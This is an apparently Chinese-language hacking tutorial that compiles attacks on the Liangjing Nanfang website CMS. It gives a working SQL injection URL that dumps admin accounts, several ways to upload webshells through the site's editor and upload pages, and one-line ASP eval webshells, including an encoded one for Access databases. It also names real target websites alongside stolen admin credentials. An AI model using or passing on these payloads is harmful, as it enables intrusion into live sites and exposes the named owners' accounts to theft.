╭──────────────────────────╮ 猫客工作室--真诚、高效、创新,敢想敢做努力做到最好! ╰──────────────────────────╯ >讲师名称:剑眉大侠(QQ767501681) >动画名称:良精南方漏洞总汇 1.存在0day漏洞,没有防注入的情况下,在网站后面加上这段代码可以直接爆出帐号密码 NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''=' 目标站:http://jmhengde.com/ admin|f88cac7b90adab28 2.存在南方数据编辑器(southidceditor) 默认路径:admin/southidceditor/admin_style.asp 通过改样式允许的后缀类型:asaspp 来上传木马拿shell 漏洞页面:admin/Southidceditor/ewebeditor.asp?id=57&style=southidc 目标站:http://jmhengde.com/ 3.通过upfile_other.asp漏洞文件直接取SHELL 直接访问userreg.asp进行注册会员,登录并在未退出登录的状态下,使用本地上传文件进行上传,代码如下:
将以上代码保存为html格式,替换代码中的网址,利用火狐浏览器的保留cookies功能来拿shell,第一个框里选择图片文件,第二个框选择cer、asa、asp等文件上传!良精南方程序的会员cookies就具有上传脚本文件的权限,说明过滤验证不成熟,这是一个致命的权限漏洞! 目标站:http://jmhengde.com/ 4.在网站配置任意处插入闭合一句话木马:"%><%eval request("g")%><%s=" 连接配置文件:inc/config.asp 密码:g 目标站:http://www.bbht.cn/ 帐号:admin 密码:wbwwcg499578 5.在网站配置的“允许的上传文件类型”处增加上传“cer“等被服务器可解析的文件类型,再上传对应格式的木马就可以了! 6.本方法适用于access数据库,只要在access数据库任何地方插入:┼攠數畣整爠煥敵瑳∨≡┩> 再把备份名成asp或者asa,访问这个asp或asa,就是一句话木马。密码a